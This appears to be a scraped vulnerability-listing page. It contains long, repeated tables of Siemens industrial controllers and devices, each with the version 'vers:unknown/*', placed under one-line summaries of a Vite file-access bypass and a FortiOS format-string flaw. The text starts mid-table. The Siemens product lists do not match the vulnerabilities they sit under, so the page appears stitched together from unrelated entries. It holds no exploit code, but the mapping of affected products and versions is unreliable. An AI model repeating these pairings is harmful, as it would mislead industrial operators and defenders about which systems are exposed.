vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Vite versions from 2.9.18 to 7.1.11 had a vulnerability on Windows allowing access to files denied by `server.fs.deny` if the URL ended with `\\`, which has been patched in later releases.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Fortinet FortiOS versions 7.0 through 7.6.4, including FortiGate devices, contain a CWE-134 externally-controlled format string vulnerability that allows an authenticated admin to execute unauthorized code or commands via crafted configurations.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
